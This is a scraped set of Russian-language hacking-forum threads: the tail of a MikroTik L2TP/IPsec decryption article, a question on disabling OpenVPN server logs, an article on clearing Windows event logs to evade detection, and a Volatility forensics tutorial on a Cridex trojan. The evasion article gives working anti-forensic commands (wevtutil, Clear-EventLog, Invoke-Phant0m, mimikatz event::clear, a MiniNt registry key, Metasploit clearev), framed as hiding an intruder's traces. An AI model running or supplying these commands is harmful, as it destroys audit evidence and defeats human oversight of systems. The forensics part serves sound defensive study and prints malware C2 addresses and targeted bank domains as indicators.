Если каким-то чудом у него есть возможность MITM, то есть пропускать трафик через себя, то толку в этом ровно никакого нет. Весь трафик зашифрован. Выдать себя за vpn сервер другим участникам корпоративной сети тоже не удастся. В подобном нереальном сценарии аутентификацию mschap2 клиенты не пройдут, ведь их секрет известен только им и вам, разумеется:

Code:Copy to clipboard

/ppp secret add name=good_user password=12345 service=l2tp

Шифрованный трафик L2TP туннеля

Исследовательский интерес нас ведет дальше. Может все-таки что-то можно сделать с трафиком? И в результате извлечь передаваемую информацию? Попробуем дешифровать трафик в лабораторных условиях. MikroTik позволяет нам выполнить debug соединения и увидеть подробную информацию об установленной IPsec сессии:

![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fcp%2Fp6%2Fq8%2Fcpp6q888v72l9hsbhg- gyoqwevw.jpeg&hash=825d0a78700be9a0d5e9def3b1dc18a9)
/ip ipsec installed-sa print

Как видно, сессия установилась на 30 минут, имеются разные ключи аутентификации и шифрования. Применим их в Wireshark, после приведения шестнадцатеричных значений к корректному формату: SPI 0x0ada181b, вместо MikroTik-овского 0xADA181B, ключи начинаются со значения 0x. Если все сделано правильно, тогда трафик откроется.

Ввод данных сессии для дешифрования IPsec

Дешифрованный IPsec

Подведем результаты

Насколько безопасно использовать L2TP c общим секретом? Абсолютно безоапасно. По сути IPsec с помощью pre shared key выполняет функцию аутентификации, но в нашем случае процедура аутентификации выполняется ранее при установлении L2TP соединения. Нет практической необходимости выполнять аутентификацию повторно. По сути MikroTik, введя возможность настройки IPsec в разделе создания L2TP сервера, автоматизирует рутинные задачи по настройке шифрованного туннеля в ручном режиме (история про танцы с бубном). Это еще один плюс в сторону использования не дорогостоящего, но качественного оборудования MikroTik. Конечно, в ручном режиме гораздо больше вариаций на тему шифрования, но по умолчанию задаются, по авторскому мнению, идеальные значения: aes256 и sha1.

автор olegtsss
источник

Какие логи нужно отключать на своем VPN сервере? (OpenVPN)

ID: 676533bbb4103b69df371bf2
Thread ID: 50756
Created: 2021-04-17T21:12:50+0000
Last Post: 2021-05-30T08:26:28+0000
Author: Vodoley
Replies: 9 Views: 2K

Здравствуйте.
Использую протокол OpenVPN. Ос на сервере Debian.
Нужно ли отключать какие нибудь логи на сервере помимо логов самого OpenVPN?
Что нибудь еще логгирует историю и ип подключений?

Уходим от обнаружения: Очищаем логи Windows (T1562.002)

ID: 676533bbb4103b69df371bf3
Thread ID: 52239
Created: 2021-05-27T15:24:32+0000
Last Post: 2021-05-27T15:24:32+0000
Author: baykal
Prefix: Статья
Replies: 0 Views: 2K

В этой статье речь пойдет о том как удаить следы вашего нежелательного присутствия в системах семейства Windows.

Defense Evasion - это cyber kill chain attack стратегия , которая включает методы, используемые злоумышленниками для предотвращения обнаружения во время их деятельности.

Немного подробностей:

MITRE TACTIC: Defenses Evasion (TA0005)

MITRE TECHNIQUE: Impair Defence (T1562)

SUBTITLE: Disable Windows Event Logging (T1562.002)

Чтобы ограничить объем данных, которые могут использоваться для обнаружения и аудита, злоумышленник может отключить ведение журнала событий Windows. Попытки входа в систему, разработка процессов, поведение других пользователей и устройств записываются в журналы событий Windows. Программное обеспечение и аналитики используют эту информацию для обнаружения артефактов.

Очистка Event log с помощью команды Wevtutil

Это системный инструмент, позволяющий просматривать подробные сведения о журналах событий и издателях. Вы также можете использовать эту команду для установки и удаления манифестов событий, экспорта, архивирования и очистки журналов.

Попробуем удалить с помощью него логи в категории Security.

Code:Copy to clipboard

wevtutil cl Security

Результат должен быть таким:

Записалось новое событие, но удалены все старые, это событие указывает на то, что логи были почищены.

Очистка Event log с помощью Powershell

Другой метод - использовать PowerShell для очистки журналов, поскольку вы можете заметить, что на компьютере есть журнал System и Security.

Запустите Powershell от имени администратора и выполните следующие команды:

Code:Copy to clipboard

Clear-Eventlog -LogName Security Clear-Eventlog -LogName System

Как результат - видим следующее:

Существует более унивесальный способ с помощью Powershell очистить все журналы событий, выполняем данную команду от имени администратора:

Code:Copy to clipboard

Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }

Phantom

Этот скрипт просматривает стеки потоков процесса службы Event Log (в частности, svchost.exe) определяет потоки журнала событий и уничтожает те потоки, которые используются службой журнала событий. Таким образом, система не сможет собирать логи, и в то же время служба Event Log будет работать.

Скачать его можно тут - Phantom.

Скачиваем данный скрипт и запускаем, предварительно выполнив команду в powershell:

Code:Copy to clipboard

powershell -ep bypass

Bypass – разрешён запуск любых PS файлов (предупреждения не выводятся) – эта политика обычно используется для автоматического запуска PS скриптов без вывода каких-либо уведомлений (например при запуске через GPO, SCCM, планировщик и т.д.) и не рекомендуется для постоянного использования.

Запускаем непосредственно выпонение скрипта Phant0m:

Code:Copy to clipboard

Import-Module .\Invoke-Phant0m.ps1 Invoke-Phant0m

Очистка следов Phant0m:

Code:Copy to clipboard

Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore

Mimikatz

Как мы можем забыть о Mimikatz, когда речь идет о Red Team? Mimikatz - наиболее эффективный метод, позволяющий не только украсть учетные данные, но и очистить журнал из средства просмотра событий.

Запустите mimikatz от имени администратора и выполните следующие команды:

Code:Copy to clipboard

privilege::debug event::clear

Записи журналов успешно очищаются.

MiniNT registry key

Вы можете поиграть с реестром, создать новый раздел реестра, как указано ниже, и перезагрузить компьютер, чтобы переопределить ветви реестра.

Code:Copy to clipboard

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt"

Этот ключ отключает программу просмотра событий и, таким образом, ограничивает создание журналов.

Немного подробностей:

К сожалению, наличие ключа реестра MiniNT заставляет различные компоненты Windows думать, что они работают в среде предустановки Windows. Примечательно, что наличие ключа нарушает работу средства просмотра событий - попробуйте открыть любой журнал, и вы увидите следующее очень бесполезное сообщение об ошибке: Event Viewer cannot open the event log or custom view. Verify that Event Log service is running or query is too long. The request is not supported (50)

Удалив данный ключ из реестра, работа Event Viewer приходит в норму.

PowerShell Empire

PowerShell Empire также можно использовать для очистки журналов, классификации потоков журнала событий и уничтожения потоков службы журнала событий.

Используйте следующую команду, чтобы запустить модуль для активных агентов:

Code:Copy to clipboard

usemodule management/phant0m execute

Metasploit

И последнее, но не менее важное: у нас есть фреймворк Metasploit для очистки журналов приложений, безопасности и системных журналов из средства просмотра событий.

В сеансе meterperter вы можете выполнить следующую команду:

Code:Copy to clipboard

clearev

На этом всё, спасибо за внимание.

автор Vander
[источник](https://protey.net/threads/uklonenie-ot-obnaruzhenija-ochischaem- logi-windows-t1562-002.540/)

Использование Volatility. Анализ оперативной памяти.

ID: 676533bbb4103b69df371bf5
Thread ID: 51944
Created: 2021-05-19T17:14:12+0000
Last Post: 2021-05-26T04:41:38+0000
Author: baykal
Prefix: Статья
Replies: 3 Views: 2K

Сегодня мы разберем базовый анализ оперативной памяти, содержащей вредоносную программу. Этот пост предназначен для начинающих криминалистов или людей, желающих изучить форензику.

В этом кратком руководстве мы будем использовать один из самых популярных программных анализаторов энергозависимой памяти: Volatility. Этот инструмент поможет нам проверить дамп памяти потенциально зараженного компьютера. Volatility поможет получить полезную информацию (о запущенных процессах, последних измененные файлах или даже истории браузера пользователя), хранящуюся в памяти компьютера.

Мы воспользуемся несколькими командами, разыграя простой сценарий с поиском Cridex. Готовы? Давайте начнем!

Подготовка

Я предполагаю, что вы уже скачали и установили Volatility на свой компьютер.

Дамп, который мы будем анализировать, можно скачать на странице со всеми базовыми сэмплами от Volatility.

Создание дампа

В случае, если вы захотите произвести анализ собственного дампа оперативной памяти, то для того, чтобы его создать, можно воспользоваться следующими программами:

FTK Imager

Redline (требует регистрации)

DumpIt.exe

win32dd.exe / win64dd.exe - имеет фантастическую поддержку psexec

На выходе вы получить файл с форматом .raw - тот самый дамп оперативный памяти, пригодный для анализа в Volatility (и не только).

Моделируя ситуацию со злоумышленником, если компьютер был выключен по приезду "Маски-Шоу", поможет файл гибернации, находящийся в %SystemDrive%/hiberfil.sys. Обычными методами удалить его проблематично, да и не осведомленные пользователи нечасто заботятся об этом.

Богатый арсенал виртуалок также подлежит анализу:

VMware - .vmem-файл

Hyper-V - .bin-файл

Parallels - .mem-файл

VirtualBox - .sav-файл (частичный файл памяти)

Их можно заранее скопировать, не выключая виртуальную машину, тем самым сохранив целостность.

Анализ дампа

Самая первая команда, которую нужно запустить, начиная анализ энергозависимой памяти: imageinfo , она поможет получить первичную информации о дампе памяти.

Code:Copy to clipboard

$ volatility -f cridex.vmem imageinfo

Флаг -f указывает на файл дампа, а imageinfo - название плагина, который мы будем использовать. После выполнения команды, будет выведен следующий результат:

Code:Copy to clipboard

Volatility Foundation Volatility Framework 2.6 INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86) AS Layer1 : IA32PagedMemoryPae (Kernel AS) AS Layer2 : FileAddressSpace (/home/panardin/Challs/cridex.vmem) PAE type : PAE DTB : 0x2fe000L KDBG : 0x80545ae0L Number of Processors : 1 Image Type (Service Pack) : 3 KPCR for CPU 0 : 0xffdff000L KUSER_SHARED_DATA : 0xffdf0000L Image date and time : 2012-07-22 02:45:08 UTC+0000 Image local date and time : 2012-07-21 22:45:08 -0400

Теперь у нас есть имя операционной системы, из которой был произведен дамп оперативной памяти - WinXPSP2x86 - можно начинать расследование. Мы должны указать используемый профиль (--profile=WinXPSP2x86) и попытаться выяснить, что же произошло на компьютере жертвы.

Давайте с помощью плагина pslist посмотрим, какие процессы выполнялись.

Code:Copy to clipboard

$ volatility -f cridex.vmem --profile=WinXPSP2x86 pslistVolatility Foundation Volatility Framework 2.6 Offset(V) Name PID PPID Thds Hnds Sess ---------- -------------------- ------ ------ ------ -------- ------ 0x823c89c8 System 4 0 53 240 ------ 0x822f1020 smss.exe 368 4 3 19 ------ 0x822a0598 csrss.exe 584 368 9 326 0 0x82298700 winlogon.exe 608 368 23 519 0 0x81e2ab28 services.exe 652 608 16 243 0 0x81e2a3b8 lsass.exe 664 608 24 330 0 0x82311360 svchost.exe 824 652 20 194 0 0x81e29ab8 svchost.exe 908 652 9 226 0 0x823001d0 svchost.exe 1004 652 64 1118 0 0x821dfda0 svchost.exe 1056 652 5 60 0 0x82295650 svchost.exe 1220 652 15 197 0 0x821dea70 explorer.exe 1484 1464 17 415 0 0x81eb17b8 spoolsv.exe 1512 652 14 113 0 0x81e7bda0 reader_sl.exe 1640 1484 5 39 0 0x820e8da0 alg.exe 788 652 7 104 0 0x821fcda0 wuauclt.exe 1136 1004 8 173 0 0x8205bda0 wuauclt.exe 1588 1004 5 132 0

В качестве альтернативыpslist можно использовать pstree , который отобразит список процессов в виде дерева:

Code:Copy to clipboard

$ volatility -f cridex.vmem --profile=WinXPSP2x86 pstree Volatility Foundation Volatility Framework 2.6 Name Pid PPid -------------------------------------------------- ------ ------ 0x823c89c8:System 4 0 . 0x822f1020:smss.exe 368 4 .. 0x82298700:winlogon.exe 608 368 ... 0x81e2ab28:services.exe 652 608 .... 0x821dfda0:svchost.exe 1056 652 .... 0x81eb17b8:spoolsv.exe 1512 652 .... 0x81e29ab8:svchost.exe 908 652 .... 0x823001d0:svchost.exe 1004 652 ..... 0x8205bda0:wuauclt.exe 1588 1004 ..... 0x821fcda0:wuauclt.exe 1136 1004 .... 0x82311360:svchost.exe 824 652 .... 0x820e8da0:alg.exe 788 652 .... 0x82295650:svchost.exe 1220 652 ... 0x81e2a3b8:lsass.exe 664 608 .. 0x822a0598:csrss.exe 584 368 0x821dea70:explorer.exe 1484 1464 . 0x81e7bda0:reader_sl.exe 1640 1484

В глаза сразу же бросается странный процесс с именем «reader_sl.exe», родителем которого выступает «explorer.exe». Это один из последних процессов, запущенных на машине, он находится в самом конце списка.

Можно также использовать плагин psxview , чтобы получить список процессов, пытающихся скрыться во время работы системы. Иногда его использование может оказаться действительно очень полезным.

Code:Copy to clipboard

$ volatility -f cridex.vmem --profile=WinXPSP2x86 psxview Volatility Foundation Volatility Framework 2.6 Offset(P) Name PID pslist psscan thrdproc pspcid csrss session deskthrd ExitTime ---------- -------------------- ------ ------ ------ -------- ------ 0x02498700 winlogon.exe 608 True True True True.. 0x02511360 svchost.exe 824 True True True True.. 0x022e8da0 alg.exe 788 True True True True.. 0x020b17b8 spoolsv.exe 1512 True True True True.. 0x0202ab28 services.exe 652 True True True True.. 0x02495650 svchost.exe 1220 True True True True.. 0x0207bda0 reader_sl.exe 1640 True True True True.. 0x025001d0 svchost.exe 1004 True True True True.. 0x02029ab8 svchost.exe 908 True True True True.. 0x023fcda0 wuauclt.exe 1136 True True True True.. 0x0225bda0 wuauclt.exe 1588 True True True True.. 0x0202a3b8 lsass.exe 664 True True True True.. 0x023dea70 explorer.exe 1484 True True True True.. 0x023dfda0 svchost.exe 1056 True True True True.. 0x024f1020 smss.exe 368 True True True True.. 0x025c89c8 System 4 True True True True.. 0x024a0598 csrss.exe 584 True True True True..

Ну, за исключением нашего случая кажется, что никакие процессы не пытаются скрыться, об этом говорит «False» в первых двух столбцах (pslist и psscan).

После того, как посмотрели запущенные процессы, неплохо было бы проверить открытые соединения на компьютере. Для этого мы будем использовать плагины connscan , netscan и sockets.

Code:Copy to clipboard

$ volatility -f cridex.vmem --profile=WinXPSP2x86 connscan Volatility Foundation Volatility Framework 2.6 Offset(P) Local Address Remote Address Pid ---------- ------------------------- ------------------------- --- 0x02087620 172.16.112.128:1038 41.168.5.140:8080 1484 0x023a8008 172.16.112.128:1037 125.19.103.198:8080 1484$ volatility -f cridex.vmem --profile=WinXPSP2x86 socketsVolatility Foundation Volatility Framework 2.6 Offset(V) PID Port Proto Protocol Address ---------- -------- ------ ------ --------------- --------------- 0x81ddb780 664 500 17 UDP 0.0.0.0 0x82240d08 1484 1038 6 TCP 0.0.0.0 0x81dd7618 1220 1900 17 UDP 172.16.112.128 0x82125610 788 1028 6 TCP 127.0.0.1 0x8219cc08 4 445 6 TCP 0.0.0.0 0x81ec23b0 908 135 6 TCP 0.0.0.0 0x82276878 4 139 6 TCP 172.16.112.128 0x82277460 4 137 17 UDP 172.16.112.128 0x81e76620 1004 123 17 UDP 127.0.0.1 0x82172808 664 0 255 Reserved 0.0.0.0 0x81e3f460 4 138 17 UDP 172.16.112.128 0x821f0630 1004 123 17 UDP 172.16.112.128 0x822cd2b0 1220 1900 17 UDP 127.0.0.1 0x82172c50 664 4500 17 UDP 0.0.0.0 0x821f0d00 4 445 17 UDP 0.0.0.0

Connscan - плагин, представляющий собой сканер TCP-соединений, sockets - умеет выводить список открытых сокетов и, наконец, NetScan(которые не может быть использоваы в нашем примере в связи с используемым профилем) сканирует Windows Vista на наличие активных соединений.

В нашем сценарии есть два TCP-соединения, использующиеся процессом с PID 1484 (просматривая выходные данные истории команд, можно легко соотнести PID 1484 с процессом explorer.exe). Мы видим, что одно из этих TCP-соединений все еще открыто, то есть то, что использует 1038 порт и обменивается данными с целевым IP-адресом 41.168.5.140.

Давайте теперь посмотрим на последние выполненные команды с помощью модулейcmdscan, consoles и cmdline.

Code:Copy to clipboard

$ volatility -f cridex.vmem --profile=WinXPSP2x86 cmdline Volatility Foundation Volatility Framework 2.6 ******************************************************************** System pid: 4 ******************************************************************** smss.exe pid: 368 Command line : \SystemRoot\System32\smss.exe ******************************************************************** csrss.exe pid: 584 Command line : C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16 ******************************************************************** winlogon.exe pid: 608 Command line : winlogon.exe ******************************************************************** services.exe pid: 652 Command line : C:\WINDOWS\system32\services.exe ******************************************************************** lsass.exe pid: 664 Command line : C:\WINDOWS\system32\lsass.exe ******************************************************************** svchost.exe pid: 824 Command line : C:\WINDOWS\system32\svchost -k DcomLaunch ******************************************************************** svchost.exe pid: 908 Command line : C:\WINDOWS\system32\svchost -k rpcss ******************************************************************** svchost.exe pid: 1004 Command line : C:\WINDOWS\System32\svchost.exe -k netsvcs ******************************************************************** svchost.exe pid: 1056 Command line : C:\WINDOWS\system32\svchost.exe -k NetworkService ******************************************************************** svchost.exe pid: 1220 Command line : C:\WINDOWS\system32\svchost.exe -k LocalService ******************************************************************** explorer.exe pid: 1484 Command line : C:\WINDOWS\Explorer.EXE ******************************************************************** spoolsv.exe pid: 1512 Command line : C:\WINDOWS\system32\spoolsv.exe ******************************************************************** reader_sl.exe pid: 1640 Command line : "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe" ******************************************************************** alg.exe pid: 788 Command line : C:\WINDOWS\System32\alg.exe ******************************************************************** wuauclt.exe pid: 1136 Command line : "C:\WINDOWS\system32\wuauclt.exe" /RunStoreAsComServer Local\[3ec]SUSDSb81eb56fa3105543beb3109274ef8ec1 ******************************************************************** wuauclt.exe pid: 1588 Command line : "C:\WINDOWS\system32\wuauclt.exe"

Первые два плагина: consoles(извлекает историю команд путем сканирования _CONSOLE_INFORMATION) и cmdscan(извлекает историю команд путем сканирования _COMMAND_HISTORY) не выдали никакой информации.

Однако cmdline, плагин отображающий аргументы командной строки процесса, действительно дал нам немного интересной информации. Теперь у нас есть полный путь к процессам, запущенным с PID 1484 и 1640. «Reader_sl.exe» становится все более и более подозрительным…

Мы знали, что процесс, который должен был быть классическим приложением Adobe Reader, был запущен из проводника, однако мы наблюдали работающее соединение с внешним IP-адресом, используемое тем же самым процессом ...

Давайте же воспользуемся плагиномprocdump, для того чтобы получить исполнительный файл, иmemdump для получения памяти процесса этого файла. Необходимо указать два дополнительных ключа: -p 1640 (интересующий PID) и --dump-dir(каталог, в котором мы хотим извлечь дамп).

Code:Copy to clipboard

$ volatility -f cridex.vmem --profile=WinXPSP2x86 procdump -p 1640 --dump-dir . Volatility Foundation Volatility Framework 2.6 Process(V) ImageBase Name Result ---------- ---------- -------------------- ------ 0x81e7bda0 0x00400000 reader_sl.exe OK: executable.1640.exe$ volatility -f cridex.vmem --profile=WinXPSP2x86 memdump -p 1640 --dump-dir . Volatility Foundation Volatility Framework 2.6 ************************************************************************ Writing reader_sl.exe [1640] to 1640.dmp

Теперь можно выполнить простой анализ этих двух файлов с помощью утилиты «strings ». Это может занять какое-то время, поскольку обычно дампы содержат много информации. Сейчас мы пытаемся отскать связь между частью информации, уже полученной из дампа (открытым TCP-соединением с IP-адресом 41.168.5.140) и процессом с PID 1640.

Code:Copy to clipboard

$ strings 1640.dmp | grep -Fi "41.168.5.140" -C 5 ABACFPFPENFDECFCEPFHFDEFFPFPACAB DpI8 POST /zb/v_01_a/in/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 41.168.5.140:8080 Content-Length: 229 Connection: Keep-Alive Cache-Control: no-cache >mtvR `06!

Я использовал команду grep в сочетании с -C #NUMBER, чтобы получить 5 строк до и после искомой, такой подход позволяет построить более полную картину. Здесь мы ясно видим, что исполняемый файл «Reader_sl.exe» обменивается данными с IP-адресом назначения 41.168.5.140 с помощью POST- запросов, потенциально извлекая информацию с компьютера жертвы.

Набравшись терпения и проанализировав некоторые части дампа при помощи strings , мы можем найти следующие интересные домены:

Code:Copy to clipboard

$ strings 1640.dmp | less... *hsbc.co.uk* *ablv.com* *accessbankplc.com* *alphabank.com.cy* *baltikums.com* *baltikums.eu* *banesco.com.pa* *bankaustria.at* *banknet.lv* *bankofcyprus.com* *bobibanking.com* *butterfieldonline.ky* *cimbanque.net* *cs.directnet.com* *directnet.com* *danskebanka.lv* *ebank.laiki.com* *ebank.rcbcy.com* *ebemo.bemobank.com* *e-norvik.lv* *eurobankefg.com* *eurobankefg.com.cy* *ekp.lv* *fbmedirect.com* *hblibank.com* *hellenicnetbanking.com* *hiponet.lv* *hkbea* *ibanka.seb.lv* *ib.baltikums.com* *geonline.lv* *ib.dnb.lv* *bib.lv* *ib.snoras.com* *i-linija.lt* *loyalbank.com* *marfinbank.com.cy* *multinetbank.eu* *nordea.com* *secure.ltbbank.com* *secure.ltblv.com* *swedbank.lv* *norvik.lv* *online.alphabank.com.cy* *online.citadele.lv* *online.lkb.lv* ...

Список доменных сайтов банка. Теперь, глядя на память процесса, у нас появляется больше причин для подозрений в отношении «Reader_sl.exe».

Давайте посмотрим, является ли исполняемый файл вредоносным.

На данный момент у нас есть два возможных способа сделать это:

путем статического анализа и реверса исполняемого файла, чтобы наглядно увидеть, какие команды выполняеются исполняемым файлом

или - поскольку в настоящее время я не очень хорошо разбираюсь в реверс-инжиниринге - попробовать динамический анализ с помощью песочницы или онлайн-инструментов, которые анализируют потенциально вредоносные исполняемые файлы.

Давайте прибегнем ко второму варианту и проанализируем файлы с помощью VirusTotal, вероятно, самого известного веб-сайта для анализа подозрительных файлов и веб- сайтов. Мне также нравится использовать: [HybridAnalysis](https://www.hybrid- analysis.com/sample/5b136147911b041f0126ce82dfd24c4e2c79553b65d3240ecea2dcab4452dcb5).

Очевидно, что исполняемый файл распознается этими двумя веб-сайтами-как вредоносный с высокими показателями обнаружения!

Пришло время подвести итоги различных исследований, которые мы провели, и наших выводов с проанализированным дампом:

Странный процесс Reader_sl.exe PID 1640 с проводником в качестве родительского (PID 1484)

Открытое соединение с 41.168.5.140:8080, используемое PID 1484

Банковские домены и 41.168.5.140 найдены в дампе процесса 1640

1640 исполняемый файл определен веб-сайтами песочницы как вредоносный троян

Если с компьютера пользователя был извлечен дамп «cridex.vmem», мы могли бы сделать вывод, что компьютер заражен трояном.

Профилактика

Предположим, что этот дамп памяти был обнаружен на компьютере сотрудника работающего в большой компании. Как судебному следователю, вам удалось проанализировать дамп изменчивой памяти и найти вредоносный exe-файл.

Однако этот исполняемый файл мог быть отправлен в ходе фишинговой кампании всем сотрудникам, поэтому теперь необходимо извлечь IOC (индикаторы взлома), чтобы максимально квалифицировать Cridex и, таким образом, помочь команде SOC обнаружить другие потенциально зараженные компьютеры.

Первым IOC, найденным в дампе, был IP-адрес C&C: 41.168.5.140. Чтобы увидеть, используются ли другие IP-адреса, мы можем, например, осуществить поиск по следующиму шаблону «/zb/v_01_a/in/» - это путь, запрошенный вредоносной программой («41.168.5.140:8080/zb/v_01_a/in/»).

Code:Copy to clipboard

$ strings 1640.dmp | grep -Fi "/zb/v_01_a/in/"http://188.40.0.138:8080/zb/v_01_a/in/cp.php POST /zb/v_01_a/in/ HTTP/1.1 http://188.40.0.138:8080/zb/v_01_a/in/cp.php http://188.40.0.138:8080/zb/v_01_a/in/cp.php

Мы нашли еще один IOC: 188.40.0.138! Посмотрим, сможем ли мы связать уже найденные IP-адреса с возможными именами хостов при помощи Passive DNS. В таком случае мы будем использовать сервис под названием Mnemonic:

Code:Copy to clipboard

results for 188.40.0.138 ------------------------ Record Type Query Answer First seen Last seen # times TTL a paypalconfirmaccount.com 188.40.0.138 2014-04-01 15:32... a dedi53.flk1.host-h.net 188.40.0.138 2012-08-06 15:42 ... a www.sandtonslippers.co.za 188.40.0.138 2012-12-27 04:21 ... a www.horizoncottages.co.za 188.40.0.138 2012-12-24 03:11 ... a blog.anafricanvilla.co.za 188.40.0.138 2012-12-14 05:11 ... a www.capetowncity.co.za 188.40.0.138 2012-10-16 17:37 ... a derwenthouse.co.za 188.40.0.138 2012-10-23 02:36 ... a www.derwenthouse.co.za 188.40.0.138 2012-10-16 18:27 ... a www.villastjames.com 188.40.0.138 2012-11-07 20:00 ... a www.capescape.co.za 188.40.0.138 2012-10-31 15:33 ... a www.wind-rose.co.za 188.40.0.138 2012-10-23 02:39 ... a wind-rose.co.za 188.40.0.138 2012-10-23 02:38 ... a static.138.0.40.188.... 188.40.0.138 2012-08-06 16:43 ... a blog.leeuwenvoet.co.za 188.40.0.138 2012-08-06 15:41 ... a www.therocks.co.za 188.40.0.138 2012-08-06 15:41 ... a www.leeuwenvoet.co.za 188.40.0.138 2012-08-02 20:17 ...results for 188.40.0.138 ------------------------ Record Type Query Answer First seen Last seen # times TTL a paypalconfirmaccount.com 188.40.0.138 2014-04-01 15:32 ... a dedi53.flk1.host-h.net 188.40.0.138 2012-08-06 15:42 ... a www.sandtonslippers.co.za 188.40.0.138 2012-12-27 04:21 ... a www.horizoncottages.co.za 188.40.0.138 2012-12-24 03:11 ... a blog.anafricanvilla.co.za 188.40.0.138 2012-12-14 05:11 ... a www.capetowncity.co.za 188.40.0.138 2012-10-16 17:37 ... a derwenthouse.co.za 188.40.0.138 2012-10-23 02:36 ... a www.derwenthouse.co.za 188.40.0.138 2012-10-16 18:27 ... a www.villastjames.com 188.40.0.138 2012-11-07 20:00 ... a www.capescape.co.za 188.40.0.138 2012-10-31 15:33 ... a www.wind-rose.co.za 188.40.0.138 2012-10-23 02:39 ... a wind-rose.co.za 188.40.0.138 2012-10-23 02:38 ... a static.138.0.40.188.... 188.40.0.138 2012-08-06 16:43 ... a blog.leeuwenvoet.co.za 188.40.0.138 2012-08-06 15:41 ... a www.therocks.co.za 188.40.0.138 2012-08-06 15:41 ... a www.leeuwenvoet.co.za 188.40.0.138 2012-08-02 20:17 ... results for 41.168.5.140 ------------------------ Record Type Query Answer First seen Last seen # times TTL a ns8.dfudont.ru 41.168.5.140 2013-01-24 09:46 ... a support.tray-international.com 41.168.5.140 2012-09-11 ... a seledkindoms.ru 41.168.5.140 2012-06-21 17:03 ...

Мы должны продолжить и проанализировать каждое возможное имя хоста, чтобы увидеть, могут ли они быть связаны с нашим трояном (время записи DNS соответствует времени заражения?, веб-сайт - легитимный?…). Затем мы передадим эти IOC команде SOC для надлежащего обнаружения троянской инфекции в инфраструктуре компании с использованием настраиваемых правил обнаружения SIEM.

Удаление

Если Cridex успел заразить и другие машины в компании, то вам следует использовать антивирус, который умеет обнаруживать и устранять угрозы, а также следует проверить, является ли вредоносный троян постоянным.

Действительно, большинство зловредов стараются автоматизировать свое выполнение при каждом запуске системы, что затрудняет их удаление. Чтобы узнать, является ли Cridex постоянным, мы можем взглянуть на записи реестра.

Ветки реестра, которые нас интересуют:
«HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, RunOnce, RunOnceEx»
Мы можем использовать Volatility, чтобы перемещаться по реестру и выводить его содержимое.

Code:Copy to clipboard

$ volatility -f cridex.vmem --profile=WinXPSP2x86 hivelist Volatility Foundation Volatility Framework 2.6 Virtual Physical Name ---------- ---------- ---- 0xe18e5b60 0x093f8b60 \Device\HarddiskVolume1\Documents and Settings\Robert\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat 0xe1a19b60 0x0a5a9b60 \Device\HarddiskVolume1\Documents and Settings\Robert\NTUSER.DAT 0xe18398d0 0x08a838d0 \Device\HarddiskVolume1\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat 0xe18614d0 0x08e624d0 \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT 0xe183bb60 0x08e2db60 \Device\HarddiskVolume1\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat 0xe17f2b60 0x08519b60 \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT 0xe1570510 0x07669510 \Device\HarddiskVolume1\WINDOWS\system32\config\software 0xe1571008 0x0777f008 \Device\HarddiskVolume1\WINDOWS\system32\config\default 0xe15709b8 0x076699b8 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY 0xe15719e8 0x0777f9e8 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM 0xe13ba008 0x02e4b008 [no name] 0xe1035b60 0x02ac3b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system 0xe102e008 0x02a7d008 [no name]

Плагин Hivelist позволяет вывести список разделов. Printkey поможет нам увидеть содержимое разделов реестра, его подразделы и значения. Теперь давайте воспользуемся параметром -K, чтобы перейти к интересующей нас ветке.

Code:Copy to clipboard

$ volatility -f cridex.vmem --profile=WinXPSP2x86 printkey -K "Software\Microsoft\Windows\CurrentVersion\Run" Volatility Foundation Volatility Framework 2.6 Legend: (S) = Stable (V) = Volatile ---------------------------- Registry: \Device\HarddiskVolume1\Documents and Settings\Robert\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Key name: Run (S) Last updated: 2011-04-13 00:55:13 UTC+0000 Subkeys: Values: ---------------------------- Registry: \Device\HarddiskVolume1\Documents and Settings\Robert\NTUSER.DAT Key name: Run (S) Last updated: 2012-07-22 02:31:51 UTC+0000 Subkeys: Values: REG_SZ KB00207877.exe : (S) "C:\Documents and Settings\Robert\Application Data\KB00207877.exe" ---------------------------- Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\default Key name: Run (S) Last updated: 2011-04-12 20:31:49 UTC+0000 Subkeys: Values: ---------------------------- Registry: \Device\HarddiskVolume1\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Key name: Run (S) Last updated: 2011-04-13 00:55:13 UTC+0000 Subkeys: Values: ---------------------------- Registry: \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT Key name: Run (S) Last updated: 2011-04-13 00:49:16 UTC+0000 Subkeys: Values: ---------------------------- Registry: \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT Key name: Run (S) Last updated: 2011-04-13 00:49:28 UTC+0000 Subkeys: Values: ---------------------------- Registry: \Device\HarddiskVolume1\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Key name: Run (S) Last updated: 2011-04-13 00:55:13 UTC+0000 Subkeys: Values:

